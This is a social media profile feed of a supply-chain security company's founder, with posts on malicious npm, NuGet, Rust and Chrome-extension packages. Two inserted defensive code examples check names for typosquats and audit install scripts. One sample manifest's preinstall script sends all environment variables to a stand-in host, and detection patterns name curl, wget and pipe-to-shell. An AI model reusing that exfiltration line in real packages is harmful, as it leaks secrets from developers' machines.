Feross
feross.bsky.social
🧙‍♂️ Mad scientist • ✨ Founder + CEO @Socket.dev (http://socket.dev) •🌲 Stanford lecturer (http://cs253.stanford.edu) • ❤️ Open source at WebTorrent + StandardJS
Pinned
🚀 Big news for JavaScript teams: Socket now supports Bun and vlt in beta.

You no longer have to choose between innovation and security. Commit a bun.lock or vlt-lock.json and Socket gives you full supply chain protection.
Reposted by Feross
🚨 New research: A spearphishing campaign published 27 malicious npm packages that host browser-run lures mimicking document portals and Microsoft sign-in to steal credentials. This operation targets manufacturing and healthcare orgs in the U.S. and allied countries.

socket.dev/blog/spearph...
Spearphishing Campaign Abuses npm Registry to Target U.S. an...
A five-month operation turned 27 npm packages into durable hosting for browser-run lures that mimic document-sharing portals and Microsoft sign-in, ta...
socket.dev
December 23, 2025 at 7:47 PM
Reposted by Feross
Another example of attackers abusing npm as infrastructure. Our threat research team found a spearphishing campaign that published 27 malicious packages to host browser-run phishing pages.

cc: @campuscodi.risky.biz @cisoseries.bsky.social @zackwhittaker.com
🚨 New research: A spearphishing campaign published 27 malicious npm packages that host browser-run lures mimicking document portals and Microsoft sign-in to steal credentials. This operation targets manufacturing and healthcare orgs in the U.S. and allied countries.

socket.dev/blog/spearph...
December 23, 2025 at 8:32 PM
Reposted by Feross
Don’t trust free VPNs, don’t install joke Chrome extensions. You know what, just don’t install anything at all from now on. And get a new PC.
🚨 Socket’s Threat Research Team uncovered two malicious "Phantom Shuttle" Chrome extensions masquerading as a VPN since at least 2017, intercepting traffic and exfiltrating credentials via attacker-controlled proxies.

Full research → socket.dev/blog/malicio...
Malicious Chrome Extensions “Phantom Shuttle” Masquerade as ...
Fake “Phantom Shuttle” VPN Chrome extensions (active since 2017) hijack proxy auth to intercept traffic and continuously exfiltrate user credentials t...
socket.dev
December 23, 2025 at 5:43 AM
Reposted by Feross
🚨 Socket’s Threat Research Team uncovered two malicious "Phantom Shuttle" Chrome extensions masquerading as a VPN since at least 2017, intercepting traffic and exfiltrating credentials via attacker-controlled proxies.

Full research → socket.dev/blog/malicio...
December 22, 2025 at 9:21 PM
Reposted by Feross
Chrome extensions are still a wild west ecosystem.

This fake “VPN” ran for years and charged users for the privilege of silently intercepting their traffic.

cc: @campuscodi.risky.biz @zackwhittaker.com @cisoseries.bsky.social
🚨 Socket’s Threat Research Team uncovered two malicious "Phantom Shuttle" Chrome extensions masquerading as a VPN since at least 2017, intercepting traffic and exfiltrating credentials via attacker-controlled proxies.

Full research → socket.dev/blog/malicio...
December 22, 2025 at 9:58 PM
Congrats @docker.com! This is the right move for the ecosystem.

In case you missed this detail: with Docker Hardened Images teams get secure application dependencies by default. @socket.dev Firewall is built in.
Hardened images should be the baseline, not a bonus feature.

@thenewstack.io breaks down why we made Docker Hardened Images free. Featuring Docker's VP of Product, Mike Donovan, on security, open source, and what comes next.
🔗 https://bit.ly/3N4DXt6
#DHI #OpenSource
Docker Sets Free the Hardened Container Images
Docker has made Docker Hardened Images (DHI) a free service, offering prepatched, secure SBOM-ready versions of widely used open source applications.
thenewstack.io
December 17, 2025 at 7:03 PM
Reposted by Feross
We’re partnering with @docker.com to make software development safer for everyone!

Socket Firewall Free is now bundled into Docker Hardened Images, adding build-time and dependency-install supply chain protection for @nodejs.org, @python.org, and @rust-lang.org

socket.dev/blog/socket-...
Socket Firewall Now Available in Docker Hardened Images - So...
Socket Firewall Free is now bundled into Docker Hardened Images, adding build-time and dependency-install supply chain protection on top of hardened b...
socket.dev
December 17, 2025 at 3:39 PM
Reposted by Feross
🥷 In this @softwaredaily.bsky.social episode, @feross.bsky.social talks about the dark side of Chrome extensions getting bought and sold to unknown buyers, a super common supply chain risk most users never see.

Check out the full episode → socket.dev/blog/softwar...
December 15, 2025 at 9:37 PM
Reposted by Feross
It's not only NPM.
🚨 New threat research: An impostor #NuGet package typosquatted a popular .NET tracing library and its author, using homoglyph tricks to blend in, then exfiltrated #Stratis wallet JSON and passwords to a Russian IP address.
Full report →
socket.dev/blog/malicio... #dotnet
Malicious NuGet Package Typosquats Popular .NET Tracing Libr...
Impostor NuGet package Tracer.Fody.NLog typosquats Tracer.Fody and its author, using homoglyph tricks, and exfiltrates Stratis wallet JSON/passwords t...
socket.dev
December 15, 2025 at 10:26 PM
Reposted by Feross
This is an extremely convincing typosquat. Also a good reminder that Google’s AI summaries are not a reliable way to determine whether a package is safe to use. 😵‍💫
🚨 New threat research: An impostor #NuGet package typosquatted a popular .NET tracing library and its author, using homoglyph tricks to blend in, then exfiltrated #Stratis wallet JSON and passwords to a Russian IP address.
Full report →
socket.dev/blog/malicio... #dotnet
December 15, 2025 at 4:38 PM
Reposted by Feross
🔮 The Myth of Magical Code from the Sky: Modern apps run on mountains of open source code that almost no one is actually reviewing.

In this @softwaredaily.bsky.social episode, @feross.bsky.social joins @joshuakgoldberg.com to talk about why that’s so risky.

Check it out→ socket.dev/blog/softwar...
December 12, 2025 at 2:18 AM
Reposted by Feross
🧨 “Gaps in design and implementation with the new OIDC Trusted Publisher workflows leave maintainers open to novel and increasingly difficult to detect gaps in their publishing setups. We do not recommend critical projects move to this new workflow..." - @notwes.bsky.social
npm has revoked classic tokens for publishing, pushing maintainers toward OIDC trusted publishing or granular tokens. But @openjsf.org warns trusted publishing still has risky gaps for critical projects. What maintainers should do next:

socket.dev/blog/npm-rev... #NodeJS #JavaScript
npm Revokes Classic Tokens, as OpenJS Warns Maintainers Abou...
GitHub has revoked npm classic tokens for publishing; maintainers must migrate, but OpenJS warns OIDC trusted publishing still has risky gaps for crit...
socket.dev
December 10, 2025 at 6:03 AM
Reposted by Feross
Feross Aboukhadijeh is the founder and CEO of @socket.dev. He joins @joshuakgoldberg.com to talk about his career, open source supply chain attacks, practical security lessons, the expanding attack surface in software development, and more.

@feross.bsky.social

bit.ly/4iMDU14
Blocking Software Supply Chain Attacks with Feross Aboukhadijeh - Software Engineering Daily
Modern software relies heavily on open source dependencies, often pulling in thousands of packages maintained by developers all over the world. This accelerates innovation but also creates serious sup...
softwareengineeringdaily.com
December 9, 2025 at 10:36 AM
Reposted by Feross
Want to work with me and a number of world-class JS open source developers at @socket.dev protecting ALL open source libraries from supply chain attacks?

We're looking for stellar frontend developers. DM me
December 10, 2025 at 6:12 PM
Excellent work, crates.io team!
This typosquat is all fancied up to look legit, seems like the threat actor put in a lot of effort here. We were once again impressed by how fast the crates.io team took it down! 👏

cc: @thisweekinrust.bsky.social @rustaceans.bsky.social @theembeddedrust.bsky.social @campuscodi.risky.biz
🚨 New Socket Threat Research: We found a malicious typosquat targeting Rust devs. The finch-rust crate mimics the legit finch crate but loads a credential-stealing payload and exfiltrates data to rust-docs-build[.]vercel[.]app.

Details + IOCs: socket.dev/blog/malicio... #Rustlang
December 5, 2025 at 11:40 PM
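The NuGet impostor a few posts up (Tracer.Fody.NLog, with homoglyphs in the package and author names) and finch-rust posing as finch are the same trick: a name that collapses onto a trusted one once look-alike characters, case and separators are folded away. The following is an added example of a pre-install name check a team could run on new dependencies; it is not Socket's code or anything from the posts, and the KNOWN_GOOD list, the CONFUSABLES table and the DECOY_AFFIXES list are illustrative assumptions rather than a complete signature set.

```javascript
// Added example: flag dependency names that collapse onto a trusted name once
// look-alike characters, case and separators are folded. Not Socket's code;
// KNOWN_GOOD, CONFUSABLES and DECOY_AFFIXES are illustrative assumptions.

const KNOWN_GOOD = ["finch", "Tracer.Fody", "lodash", "express"];

// Common homoglyph substitutions (Cyrillic/Greek letters and digits that look
// like Latin letters). Deliberately small; a real deployment would use the
// Unicode confusables.txt table.
const CONFUSABLES = {
  "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
  "\u0443": "y", "\u0445": "x", "\u0456": "i", "\u0458": "j", "\u0455": "s",
  "\u03b1": "a", "\u03bf": "o", "\u03c1": "p", "\u03b9": "i",
  "0": "o", "1": "l",
};

// Affixes attackers bolt onto a real name to pose as an official variant.
const DECOY_AFFIXES = ["rust", "js", "node", "py", "nlog", "official", "core", "utils"];

// Reduce a name to a comparison skeleton: Unicode compatibility normalization,
// homoglyph folding, lowercasing, and removal of ".", "-" and "_" separators.
function skeleton(name) {
  return Array.from(name.normalize("NFKC"))
    .map((ch) => CONFUSABLES[ch] ?? ch)
    .join("")
    .toLowerCase()
    .replace(/[-_.]/g, "");
}

// Classic single-row Levenshtein edit distance.
function levenshtein(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0];
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j];
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      row[j] = Math.min(above + 1, row[j - 1] + 1, diag + cost);
      diag = above;
    }
  }
  return row[b.length];
}

// Classify a candidate name against the known-good list. Returns the first
// match in priority order: exact, homoglyph/lookalike, one-edit typosquat,
// decoy affix; otherwise "unknown".
function analyzePackageName(candidate, knownGood = KNOWN_GOOD) {
  const cand = skeleton(candidate);
  const nonAscii = /[^\x00-\x7f]/.test(candidate);
  for (const good of knownGood) {
    const base = skeleton(good);
    if (cand === base) {
      if (candidate === good) return { verdict: "exact", target: good };
      // Same skeleton but a different string: non-ASCII means homoglyphs were
      // used; ASCII-only means case/separator/digit games (l0dash, Tracer-Fody).
      return { verdict: nonAscii ? "homoglyph" : "lookalike", target: good };
    }
    // One edit away from a reasonably long name (finsh, lodsh). Short names are
    // skipped because one edit legitimately separates many 3-letter names.
    const d = levenshtein(cand, base);
    if (base.length >= 4 && d <= 1) return { verdict: "typosquat", target: good, distance: d };
    for (const affix of DECOY_AFFIXES) {
      if (cand === base + affix || cand === affix + base) {
        return { verdict: "decoy-affix", target: good, affix };
      }
    }
  }
  return { verdict: "unknown", target: null, nonAscii };
}

// Constructed sample names: the two cases from the posts plus a few controls.
const SAMPLES = ["finch", "finch-rust", "Tracer.Fody.NLog", "Tr\u0430cer.Fody", "lodsh", "left-pad"];
for (const name of SAMPLES) console.log(name, "->", analyzePackageName(name));
```

Anything other than "exact" or "unknown" is a reason to stop and look at the publisher, the repository link and the install scripts before adding the dependency. The check is intentionally conservative about short names, and a registry-side version would also compare against the maintainer handle, since the NuGet case spoofed the author as well as the package.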
CVE volume is ahead of last year, even with a small dip in November.

42,697 CVEs through Nov 30, running 16.9 percent higher than 2024.

The chart makes it obvious how steady the upward curve has been all year. The overall trend is sustained growth in disclosures.
December 5, 2025 at 9:12 PM
Reposted by Feross
A reality for anyone scaling a team:

"What got you from zero to one is not what's going to get you from one to 10. So you have to constantly evolve the way you run your business." -
@feross.bsky.social on the Vlad Kachur Show

🧨 Full Interview: socket.dev/blog/scaling...
December 2, 2025 at 8:30 PM
Happy holidays!
🙄 The holiday themed npm spam has arrived: 420+ auto-generated elf-stats-* packages claiming to be published every 2 min. This is just registry abuse at scale, and it’s a waste of everyone’s time. Nobody is going to accidentally install these packages but they're still unsafe to run. #NodeJS
Seasonal nuisance on npm this morning: 420+ auto-generated elf-stats-* packages, many claiming “generated every two minutes,” published from new throwaway accounts. Payloads are simple but unsafe (exfil / preinstall scripts). npm is already removing packages.

socket.dev/blog/elves-o... #NodeJS
December 3, 2025 at 5:33 PM
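The elf-stats-* packages above are dangerous even though nobody would install them on purpose: npm runs a dependency's preinstall, install and postinstall scripts automatically, so one accidental or transitive pull is enough. The following is an added example, not Socket's tooling or anything from the elf-stats post, of a manifest audit that lists every auto-run hook in a dependency tree and flags the ones that look like droppers. The SAMPLE_MANIFESTS and the SUSPICIOUS patterns are constructed for illustration; only the three hook names are a fact about npm.

```javascript
// Added example: list lifecycle scripts that npm runs automatically when a
// dependency is installed, and flag the ones that look like droppers. Not
// Socket's tooling; the manifests and the heuristic patterns are constructed
// for illustration.

// Hooks npm executes for a dependency fetched from the registry, in order.
const AUTO_RUN_HOOKS = ["preinstall", "install", "postinstall"];

// Heuristic indicators of "download and execute" or obfuscation in a one-line
// install script. Assumed patterns, not a definitive signature set.
const SUSPICIOUS = [
  { label: "network-fetch", re: /\b(curl|wget|Invoke-WebRequest|https?:\/\/)/i },
  { label: "inline-eval",   re: /\b(node\s+-e|eval\s*\(|new\s+Function\b)/ },
  { label: "shell-pipe",    re: /\|\s*(ba)?sh\b/ },
  { label: "encoding",      re: /\b(base64|Buffer\.from\([^)]*['"]hex['"])/i },
  { label: "env-dump",      re: /process\.env\b|\benv\b\s*\|/ },
];

// Given an array of parsed package.json objects, return one finding per
// auto-run hook, with the matched indicator labels and a coarse risk level.
function auditManifests(manifests) {
  const findings = [];
  for (const m of manifests) {
    const scripts = m.scripts || {};
    for (const hook of AUTO_RUN_HOOKS) {
      const cmd = scripts[hook];
      if (typeof cmd !== "string") continue;
      const indicators = SUSPICIOUS.filter(({ re }) => re.test(cmd)).map(({ label }) => label);
      findings.push({
        pkg: `${m.name}@${m.version}`,
        hook,
        cmd,
        indicators,
        risk: indicators.length ? "high" : "review", // any install hook deserves a look
      });
    }
  }
  return findings;
}

// Constructed sample manifests (not real packages): a spam-style dropper that
// ships the environment to a remote host, a legitimate native addon build
// step, and a plain library with no hooks.
const SAMPLE_MANIFESTS = [
  {
    name: "elf-stats-0042",
    version: "1.0.0",
    scripts: {
      preinstall: "node -e \"require('https').get('https://example.invalid/c?u='+encodeURIComponent(JSON.stringify(process.env)))\"",
    },
  },
  { name: "native-addon", version: "2.1.0", scripts: { postinstall: "node-gyp rebuild", test: "tap" } },
  { name: "plain-lib", version: "0.3.1", scripts: { test: "mocha" } },
];

for (const f of auditManifests(SAMPLE_MANIFESTS)) console.log(f);
```

In a real tree you would feed this every node_modules/**/package.json after a `npm ci --ignore-scripts`, which fetches without executing hooks; the "review" findings are then the short list of packages (native addons and the like) that genuinely need `npm rebuild`, and the "high" ones are the ones to remove before any script runs. Setting `ignore-scripts=true` in .npmrc makes that the default for CI.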
Reposted by Feross
Major props to the Crates.io team - they removed this crate within just minutes of it being reported. 💪

cc: @campuscodi.risky.biz @thisweekinrust.bsky.social @theembeddedrust.bsky.social @rustaceans.bsky.social @weeklyrust.substack.com.web.brid.gy
🚨 New Socket Threat Research: We found a malicious Rust crate disguised as an EVM version helper that downloads & silently executes OS-specific payloads, likely for crypto theft. The crate was live for 8 months and was swiftly removed after we reported it.

socket.dev/blog/malicio... #Rustlang
Malicious Rust Crate evm-units Serves Cross-Platform Payload...
Malicious Rust crate evm-units disguised as an EVM version helper downloads and silently executes OS-specific payloads likely aimed at crypto theft.
socket.dev
December 3, 2025 at 4:24 AM
Reposted by Feross
🎙️ Why great products don't always win: Socket CEO @feross.bsky.social breaks down a hard truth for technical founders in this conversation with Vlad Kachur on scaling a security company.

Check out the full interview → socket.dev/blog/scaling... #appsec #infosec
December 2, 2025 at 4:25 PM
Reposted by Feross
The Socket Threat Research Team continues to track North Korea’s Contagious Interview operation as it systematically infiltrates the npm ecosystem. socket.dev/blog/north-k... @socket.dev
Inside the GitHub Infrastructure Powering North Korea’s Cont...
Socket Threat Research maps a rare inside look at OtterCookie’s npm-Vercel-GitHub chain, adding 197 malicious packages and evidence of North Korean op...
socket.dev
December 1, 2025 at 12:53 PM
More malicious Chrome extensions.

Stay vigilant!
Socket @socket.dev · Nov 25
🚨 Socket researchers uncovered a malicious Chrome extension that injects hidden #SOL transfers into Raydium swaps, quietly siphoning fees to an attacker wallet.

Full analysis → socket.dev/blog/malicio... #Solana
Malicious Chrome Extension Injects Hidden SOL Fees Into Sola...
Socket researchers identified a malicious Chrome extension that manipulates Raydium swaps to inject an undisclosed SOL transfer, quietly routing fees ...
socket.dev
November 25, 2025 at 7:57 PM
Reposted by Feross
Update: at time of writing Eleventy core (0.x, 1.x, 2.x, 3.x, 4.x prereleases) and our official plugins are still unaffected.

(Compromised package count was updated to 834 from 533 in the latest @socket.dev update)
Socket @socket.dev · Nov 25
⚠️ Major Update on the Shai Hulud v2 campaign:

We’ve confirmed 834 malicious packages and now see spillover into Maven Central. The package org.mvnpm:posthog-node:4.18.1 contains the same Bun-based payload used in the npm compromise.

Updated analysis →
socket.dev/blog/shai-hu... #Java
Shai Hulud Strikes Again (v2) - Socket
Another wave of the Shai-Hulud campaign has hit npm with more than 500 packages and 700+ versions affected.
socket.dev
November 25, 2025 at 7:11 PM